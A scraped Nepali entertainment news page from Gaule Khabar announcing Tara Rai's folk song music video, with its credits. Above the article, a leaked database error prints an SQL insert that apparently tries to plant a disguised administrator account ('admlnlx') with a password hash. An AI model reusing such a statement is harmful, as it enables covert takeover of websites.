WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmwe5X3dKbhE//IcVhXKxB.IpPn8HK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:20:14', '', 'admlnlx', 'admlnlx')

तारा राईको सेवा आलाङ ओनोइ सार्वजानिक (भिडियो सहित) – Gaule Khabar

तारा राईको सेवा आलाङ ओनोइ सार्वजानिक (भिडियो सहित)

तारा राईको सेवा आलाङ ओनोइ सार्वजानिक (भिडियो सहित)

काठमाण्डौं । तारा राईको पूर्वेली लोकगीतको भिडियो डिजिटल बजारमा सार्वजनिक भएको छ । गायिका राईको आफनै शब्द, संगितमा शनिबार ‘सेवा आलाङ ओनोइ’ बोलको गीत सार्वजनिक गरेकी हो ।

गायीका तारा राई र कृष्णभक्त राईको स्वार रहेको गीतमा सगीत सम्योजन कृष्ण भक्त राईको रहेको छ ।

उक्त गीतको म्युजिक भिडियोमा चर्चित हास्य कलाकार उमेश राई फुलन्देको आमा, निकेश राई र आशिष पाख्रिनको फिचरिङ रहेको छ । म्युजिक भिडियोमा निकेश राईको निर्देशन र सुमन लामिछानेको नृत्य निर्देशन गरेकाछन भने छयाङकन र संपादन गंगाराम राईको रहेको छ ।

भिडियो हेर्नको लागि

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका